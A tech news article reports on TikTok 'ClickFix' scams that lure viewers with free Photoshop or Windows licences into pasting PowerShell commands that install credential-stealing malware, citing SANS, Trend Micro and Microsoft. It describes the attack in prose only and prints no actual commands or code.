This TikTok Scam Promises You a Free Photoshop or Windows License – and Then Steals Your Info

If you see a TikTok 'tech tip' telling you to paste code, it's likely a scam. But what exactly is happening behind the scenes? Follow ZDNET: Add us as a preferred source on Google.

TikTok has become a popular platform for spreading information-stealing malware and other payloads, with free software acting as the bait. On October 17, Senior ISC Handler Xavier Mertens warned about the rise of these attacks in a post published on the SANS Institute's Internet Storm Center website. The wave of attacks leverages ClickFix social engineering techniques to dupe victims into downloading malware onto their systems.

According to Mertens, the scams often use ClickFix tactics, which involve providing step-by-step instructions that trick users into "hacking" themselves. These instructions might include using a Windows shortcut and copy-pasting a snippet of code into a command prompt to trigger a PowerShell script. The goal is to bypass traditional anti-phishing protections and open up the device for exploitation.

In one example, a scammer posted content on TikTok – with over 500 likes – that claimed to provide an easy way to activate Photoshop for free. The victim was asked to start PowerShell as an administrator and trigger one line of code, which then executed "Updater.exe," a Trojan designed to steal credentials and system information. An additional shellcode was also launched in memory.

ZDNET explored TikTok for similar videos and found that many were live. For example, in the screenshot below, the author was promoting a fake way to download and install Adobe Photoshop without the need for a license. Other examples we found included fake, free ways to license Microsoft Windows.

Fake TikTok video promoting a free Photoshop license

ClickFix is a particularly nasty social engineering technique that tries to bypass traditional anti-phishing protections by tricking users into "hacking" themselves. These tactics are laid out in a way that is easy to understand and are given a fake purpose – such as for fixing a minor technical glitch, using paid software for free, or as a "life hack" for improving popular streaming services.

Once the victim has unwittingly opened up their device for exploitation, a malicious payload is deployed and executed. The malware recorded in ClickFix campaigns includes information stealers, Remote Access Trojans (RATs), ransomware, and worms.

This is not the first time TikTok and Clickfix have been linked. In March, cybersecurity researchers from Trend Micro reported that TikTok videos, potentially generated through AI tools, were being distributed on the platform to spread Vidar and StealC information stealers. A network of faceless accounts posted videos on topics including improving Spotify and included step-by-step instructions that launched a PowerShell command to load malware.

"The vast user base and algorithmic reach of social media platforms provide an ideal delivery mechanism for threat actors," the researchers noted. "For attackers, this means broad distribution without the logistical burden of maintaining an infrastructure."

Earlier this month, Microsoft warned that Clickfix is becoming increasingly popular as a method of infiltrating networks, stealing data, and deploying malware. In the Redmond giant's latest Digital Defense report, Microsoft said that since 2024, Clickfix tactics have been recorded as a method of initial access in 47% of attacks, ahead of phishing and password "spray and pray" attack methods.

How to Protect Yourself Against ClickFix Attacks?

Additionally, we tested the best antivirus software for Windows: Here's what I'd use to protect my PC This new Android exploit can steal everything on your screen – even 2FA codes